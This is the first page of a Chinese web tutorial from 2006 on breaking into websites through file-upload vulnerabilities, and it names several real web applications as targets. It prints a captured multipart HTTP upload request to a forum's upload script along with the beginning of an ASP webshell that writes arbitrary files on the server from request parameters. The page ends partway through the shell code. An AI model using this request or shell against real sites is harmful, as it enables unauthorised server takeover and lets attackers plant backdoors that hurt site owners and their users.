WEB开发网
开发学院网络安全黑客技术 实例分析 上传漏洞入侵实战及扩展 阅读

实例分析 上传漏洞入侵实战及扩展

 2006-11-07 20:06:12 来源:WEB开发网   
核心提示:【上传漏洞欺骗技术】网络上许多程序都有着上传漏洞,比如任我飞扬整站程序、动感购物商城、秋叶商城、惠信新闻系统等,实例分析 上传漏洞入侵实战及扩展,本文主要讲解上传漏洞的入侵实战以及一些扩展利用,首先我们要获得客户端和服务器之间传递的数据,事先准备好一个ASP木马准备上传,当然不可能成功

上传漏洞欺骗技术

网络上许多程序都有着上传漏洞,比如任我飞扬整站程序、动感购物商城、秋叶商城、惠信新闻系统等。本文主要讲解上传漏洞的入侵实战以及一些扩展利用。首先我们要获得客户端和服务器之间传递的数据,事先准备好一个ASP木马准备上传,当然不可能成功,我们要的就是这中间我们向服务器提交的数据。一般用WsockExpert来获得数据,由于数据太多只能把关键部分发出来如下:

POST /bbs/upfile.asp HTTP/1.1

……. 省略了N多没用信息

Content-Length: 1792

Connection: Keep-Alive

Cache-Control: no-cache

Cookie: ASPSESSIONIDQQTDTATD=NLDNNHPDJEEHOFNFBAGPOJKN

-----------------------------7d52191850242

Content-Disposition: form-data; name="filepath"

uploadFace

-----------------------------7d52191850242

Content-Disposition: form-data; name="act"

upload

-----------------------------7d52191850242

Content-Disposition: form-data; name="file1"; filename="E:木马aspshell.asp"

Content-Type: text/plain

<% dim objFSO %>

<% dim fdata %>

<% dim objCountFile %>

<% on error resume next %>

<% Set objFSO = Server.CreateObject("Scripting.FileSystemObject") %>

<% if Trim(request("syfdpath"))<>"" then %>

<% fdata = request("cyfddata") %>

<% Set objCountFile=objFSO.CreateTextFile(request("syfdpath"),True) %>

1 2 3 4  下一页

Tags:实例分析 上传 漏洞

编辑录入:爽爽 [复制链接] [打 印]
赞助商链接